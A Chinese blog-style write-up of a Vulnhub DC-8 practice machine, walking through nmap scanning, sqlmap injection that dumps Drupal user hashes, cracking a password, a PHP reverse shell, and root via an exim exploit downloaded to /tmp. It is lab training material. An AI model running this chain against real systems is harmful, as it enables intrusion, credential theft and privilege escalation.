说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-8是本系列最后一幕,全程只有一个falg,获取root权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。
下载地址:
Download: http://www.five86.com/downloads/DC-8.zip
目标机IP地址:192.168.5.143
攻击机kali IP地址:192.168.5.135
arp-scan -l进行主机查找。
nmap -sS -sV -p- 192.168.5.143 端口扫描。
与DC-7一样后台同样使用了Drupal CMS。
web版本详情。
目录爆破发现:
http://192.168.5.143/robots.txt,访问页面中提示了一些路径。
发现注入点,点击Details。
数字型注入,sqlmap跑一波。爆出数据库。
sqlmap -u "http://192.168.5.143/?nid=1" --dbs
查看d7db数据库的所有的表,然后看一下users表中的所有字段。
sqlmap -u "http://192.168.5.143/?nid=1" -D d7db --tables
sqlmap -u "http://192.168.5.143/?nid=1" -D "d7db" -T "users" --columns
查看name字段与pass字段,获取用户与密码。
admin/$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john/$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
sqlmap -u "http://192.168.5.143/?nid=1" -D "d7db" -T "users" -C "name,pass" --dump
将admin,john 以及他们加密的密码分别进行保存,使用john工具进行解密。
john/turtle
访问登陆页面登陆后台。
进入后台后,根据DC7的渗透流程,可能会存在插入php代码的地方。不出所料如图所示。
编辑好设置信息后发邮件才可触发。
我们直接反弹shell。本地监听7777。
有个坑....在此处,先写上任意字符,然后在写php代码才行,还有就是上来不要着急编辑,先设置好Text format 。
切换交互式shell。
python -c 'import pty;pty.spawn("/bin/bash")'查找符合权限的文件。
find / -perm -u=s -type f 2>/tmp/null
发现exim4是可以用来提权的。
searchsploit exim 一下,查看可以利用的漏洞。
查看了一下版本信息,对照漏洞表选择利用方式。
该脚本有两种利用规则,分别为:Usage (setuid method) 、Usage (netcat method) 详情参照该链接。
https://www.exploit-db.com/exploits/46996将脚本:set ff=unix一下然后保存,脚本改名为dc8.sh 上传到攻击机中。根据脚本中的使用方式,进行提权。
tmp可任意读写,将文件下载到tmp下执行。
开启Apache,攻击者直接将脚本下载到tmp下。
./dc8.sh -m netcat 提权成功。
DC系列将要告一段落,但是学习的道路永无止境。句号既是结束,又是起笔的开始,享受过程,充实人生。
我从来没有长大,但我从来没有停止过成长
——阿瑟·克拉克
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
本文始发于微信公众号(thelostworld):DC-8靶机解题思路
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论